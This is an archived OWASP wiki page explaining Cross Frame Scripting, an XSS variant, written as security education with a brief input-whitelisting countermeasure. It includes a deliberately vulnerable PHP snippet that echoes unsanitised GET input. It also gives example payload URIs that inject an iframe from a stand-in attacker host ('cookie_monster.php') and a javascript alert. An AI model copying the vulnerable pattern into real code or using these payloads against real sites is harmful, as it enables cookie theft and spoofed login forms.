This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Cross Frame Scripting

From OWASP
Revision as of 21:28, 4 November 2007 by Rezos (talk | contribs) (New page: {{Template:Attack}} ==Description== Cross Frame Scripting (XFS) is an attack that belongs to the Cross Site Scripting family. The attacker using this technique injects code in a frame. Th...)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search
This is an Attack. To view all attacks, please see the Attack Category page.


Description

Cross Frame Scripting (XFS) is an attack that belongs to the Cross Site Scripting family. The attacker using this technique injects code in a frame. Thanks to the XFS attacks he's able to inject his own content to a log in form, which purpose is to authorize the valid user to his/her bank or auction account.

Examples

The attacker has found a website, which allows for variable manipulation. In addition variables are sended using GET or POST methods but they are not properly validated, e.g.:

cat greetz.php
<?php
print "Hello! Welcome to Hell!";
print $_GET['greetings'];
?>

If the attacker would write the following URI:

/greetz.php?greetings=<iframe src="http://my.evilsites.com/cookie_monster.php"></iframe>;

then the successful code injection attack would be conducted.

Another example is a simple Java Script nesting:

/greetz.php?greetings=<iframesrc=javascript:alert('0wn3d!');></iframe>

The attacker may merge the above examples with an appropriate frame attributes. After that it should be easier to adjust injected code to the original layout of the page, which is prone to a Cross Frame Scripting. This attack can also be successfully used to bypass limitations in e.g. E-kiosk, which provides Internet for a money or just to its extra functionality/areas.

References:

Related Threats

Related Attacks

Related Vulnerabilities

Related Countermeasures

Use whitelists and determine (whenever it's possible) the expected input data format.

Categories

Category:Injection